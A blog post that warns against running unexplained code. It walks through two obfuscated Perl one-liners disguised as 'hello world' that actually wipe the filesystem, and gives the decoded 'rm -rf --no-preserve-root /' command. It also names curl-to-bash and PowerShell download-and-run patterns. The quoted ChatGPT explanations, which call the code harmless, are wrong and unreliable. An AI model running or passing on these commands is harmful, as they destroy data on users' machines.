A bit of perl trickery (or why you don’t should just execute any code you find on-line)
Posted by jpluimers on 2026/07/09
[Wayback/Archive] A bit of perl trickery shows a great example why you should only code you understand.
It explains the innards of a classic trap luring people into execute some obfuscated code, in this case Perl based.
Which makes it yet another testament to not blindly download and execute stuff from the internet.
So be aware when you see obfuscated scripts and things luring you into:
iex ((New-Object System.Net.WebClient).DownloadString(piped through PowerShell.curlpiped through bash, Perl, Python or other scripting languages
Be even more alert when these require elevated access (like running under sudo).
Via: [Wayback/Archive] Leo Bicknell on Twitter: “@jpluimers @IanColdwater Executes “rm -rf /”. This is ancient Perl monks way of teaching people not to run programs they don’t understand as root. … But hey, these days people “curl -o – url | bash”. It’s surprising that isn’t exploited more.”
Which was response to me asking what the below code did that was fully misunderstood by ChatGPT (which is Large Language Model based on a large corpus of natural language, not a small corpus of evil red-team programming language code snippets) to a series of Tweets by Ian Coldwater.
Later I found older explanations as this Perl gag has running around for some 2 decades now, but they are not on par with the above explanation by Leo Bicknell:
- [Wayback/Archive] Analysis of a malicious “perl -e” sig
- analysing the 2004 post signature in [Wayback/Archive] Windows Accelerators – Do They Really Work? – Slashdot
- via [Wayback/Archive] will be happy to read the explanation
- [Wayback/Archive] Malicious Code
Back to the original tweets from Ian Coldwater (I copied the quoted text from the alt-text i the images):
- [Wayback/Archive] Ian Coldwater 📦💥 on Twitter: “TIL ChatGPT has trouble understanding Perl code (spoiler alert: this is very much not what this code does)”
“what does this code do?
echo "hello world" | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'““This code is a Perl one-liner that prints
"hello world"to the console, but it does so in a very obfuscated way. Let’s break it down:echo "hello world"simply prints “hello world” to the console.|is a pipe, which takes the output of the preceding command and passes it as input to the following command. perl -e tells the command-line interpreter to execute the following Perl code.'...'contains the Perl code that will be executed.`$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|{;;y; -/:-@[-{-};-{/" -;;`is a string that contains some special characters that will be used in the code.s;;$_;seeis a regular expression substitution that replaces the empty string with the string “hello world”.”“The Perl code can be decoded as follows:
$?# Set the exit status to 0 (success).?s# Increment the first character of the string (the empty string) by 1.:;# Else, replace the empty string with a semicolon.s:s;# Replace the second character of the string (semicolon) with the first character.$?# Set the exit status to the new value of the second character (semicolon).:s;# Replace the third character of the string (the second semicolon) with the first character.;=]# Append the characters “;=]” to the string.>%-# Shift the last three characters of the string to the left by one position.{<-|}# Replace the next three characters with “{<-|}”.<&|`{ #Append the characters “<&|`{” to the string.;y; -/:-@[-`{-};`-{/" -;;# Translate the string using the given mapping.s;;$_;see# Replace the empty string with “hello world”.”“Overall, this code is a clever way to write a “hello world” program in a single line of Perl code, but it’s not very readable or maintainable.”
- [Wayback/Archive] Ian Coldwater 📦💥 on Twitter: “ChatGPT didn’t even attempt to understand what this Perl code does and just threw up its hands like “idk” “
“what does this code do?
echo "hello world" | perl -e 'eval unpack u=>q{T<WES=&5M(G)M("UR9B`M+6YO+7!R97-E<G9E+7)O;W0@+R`R/B]D978O;G5L;"([97AI=}'““This command prints the string
"hello world"to the console, but the interesting part is what comes after the pipe symbol. The code after the pipe is written in Perl and it does the following: 1. Unpacks a string using the “unpack” function. The string is"T<WES=&5M(G)M("UR9BM+6YO+7!R97-E<G9E+7)O;W0@+RR/B]D978O;G5L;"([97AI=". 2. Evaluates the resulting unpacked string using the “eval” function. The unpacked string appears to be a series of encoded characters that are being decoded and executed by the “eval” function. Without additional information about the context and purpose of this code, it is difficult to determine the exact function of this code, but it appears to be a form of obfuscation or encryption.” - [Wayback/Archive] Ian Coldwater 📦💥 on Twitter: “(I do not recommend running any of this code on your machine. Like, really. You have been very strongly warned)”
The last tweet later got the reply [Wayback/Archive] fmajestic 🌱 on Twitter: “@IanColdwater $ perl -e 'print unpack u=>q{...}' system"rm -rf --no-preserve-root / 2>/dev/null";exit 😅”.
Queries just in case you want to dig deeper:
- [Wayback/Archive] PowerShell iex ((New-Object System.Net.WebClient).DownloadString( – Google Search
- [Wayback/Archive] curl sudo bash – Google Search
- [Wayback/Archive] perl -e ‘$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/” -;;s;;$_;see’ – Google Search
–jeroen






Leave a comment